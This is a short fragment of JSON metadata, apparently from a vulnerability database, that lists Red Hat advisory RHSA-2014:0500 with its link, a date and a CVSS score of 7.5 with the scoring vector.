"2018-06-07T05:02:31", "id": "RHSA-2014:0500", "href": "https://access.redhat.com/errata/RHSA-2014:0500", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}